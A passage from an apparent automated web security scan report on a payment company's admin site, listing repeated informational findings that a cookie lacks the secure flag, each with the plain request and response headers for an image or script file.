Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebb8-3cb-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 971
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aL.......N..M..O..M..N.............Pw................Px....Pw.............'Y.k.....'X.5b....5c.6d.y.....Bm.5c....Ov.}..l.....%W..........Jt....|..Ov.......$T.Cn.6d..........z..%V.......y..Hp....C
...[SNIP]...

7.22. https://admin.ccbill.com/images/ccb_LoginBoxBottom.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxBottom.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxBottom.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebb9-73e-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1854
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aJ.!...............................................................................................................................................................................................
...[SNIP]...

7.23. https://admin.ccbill.com/images/ccb_LoginBoxDiv.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxDiv.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxDiv.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fa7-10c-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 268
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.............!.......,..................4m..+.\..n_HJc..g.R...p).amwx.......&".H."......r.RW.B.f.[h..]..cc.x..}k^;...gsX.uo.Wl_.7..2.Rx..q......x...    R.5.....p9....3.PjU..s..q
......8{.J..;Z+...
...[SNIP]...

7.24. https://admin.ccbill.com/images/ccb_LoginBoxLeft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxLeft.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxLeft.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:04 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebbb-45b-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1115
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.......................................................................................................!.......,........... &...E
WM..A@,.4 .D.=..j..P&..

F.qX.$...8.|......
1.....:..ox..4&.W...
...[SNIP]...

7.25. https://admin.ccbill.com/images/ccb_LoginBoxRight.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxRight.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxRight.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57eaa-450-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1104
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.......................................................................................................!.......,........... .d    DY5I..<.@..f....W.=......(....X0..K.x.8..&...N......n,."...I......
...[SNIP]...

7.26. https://admin.ccbill.com/images/ccb_LoginBoxTop.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_LoginBoxTop.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_LoginBoxTop.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680faa-6ea-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1770
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aJ......................................................................................................!.......,....J...... .dI>h.Bl..p,.tm.x..|....pH,....r.l:...t.l.TX.v.-aQ..`L.....z.n....|N.
...[SNIP]...

7.27. https://admin.ccbill.com/images/ccb_OnlineSupportBox1Bkg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_OnlineSupportBox1Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox1Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebbe-394-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 916
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

7.28. https://admin.ccbill.com/images/ccb_OnlineSupportBox2Bkg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_OnlineSupportBox2Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox2Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "30718-3e9-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1001
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

7.29. https://admin.ccbill.com/images/ccb_OnlineSupportBox3Bkg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_OnlineSupportBox3Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_OnlineSupportBox3Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:06 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "35f28d-359-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 857
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

7.30. https://admin.ccbill.com/images/ccb_SupportBarBottom.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarBottom.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarBottom.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:09 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "57eaf-4bb-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1211
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89aJ......................................................................................................!.......,....J.......#.d...4.R1.Q.P..a..9]....bH,....r.l:...tJ.Z...v..z...xL.....O.s.....Ci
...[SNIP]...

7.31. https://admin.ccbill.com/images/ccb_SupportBarDiv.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarDiv.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarDiv.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680faf-45-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 69
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..c..........!.......,......c.............*.0......DV.uf...k..;

7.32. https://admin.ccbill.com/images/ccb_SupportBarLeft.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarLeft.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarLeft.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "35f290-304-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 772
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..c....................................................................................................!.......,......c.....".S...qX..,...ER..dC2.......h..n.)...RPsh.b..g.xz......>f.-....P.!...
...[SNIP]...

7.33. https://admin.ccbill.com/images/ccb_SupportBarRight.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_SupportBarRight.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_SupportBarRight.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:08 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebc5-310-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 784
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..c....................................................................................................!.......,......c.....2h.......1.u\.!    A0-<....h0P@X......v..o
..8.D..; 2...G.%.........h.
!
...[SNIP]...

7.34. https://admin.ccbill.com/images/ccb_System5Banner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_System5Banner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_System5Banner.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "51ebc6-9df-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 2527
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a..,........GS......Qp)j..6........S.u..K~.8s.!Z./j.+e.................B.3n.h......k..Z..J.-n.Rl.2p..........'_.+j.hz....)e.....V............................<\t..................................
...[SNIP]...

7.35. https://admin.ccbill.com/images/ccb_System5Bkg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /images/ccb_System5Bkg.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/ccb_System5Bkg.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginIndex.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:07 GMT
Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT
ETag: "1680fb3-6ad-48f3a34a5d140"
Accept-Ranges: bytes
Content-Length: 1709
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

7.36. https://admin.ccbill.com/js/AC_RunActiveContent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/AC_RunActiveContent.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:43 GMT
ETag: "1690841-22de-4933d81929cc0"
Accept-Ranges: bytes
Content-Length: 8926
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

//v1.7
// Flash Player Version Detection
// Detect Client Browser type
// Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved.
var isIE = (navigator.appVersion.indexOf("MSIE") != -1)
...[SNIP]...

7.37. https://admin.ccbill.com/js/liveChat.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /js/liveChat.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/liveChat.js HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 09 Apr 2011 00:20:36 GMT
ETag: "d92d0-26a-4a0714fb73d00"
Accept-Ranges: bytes
Content-Length: 618
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript
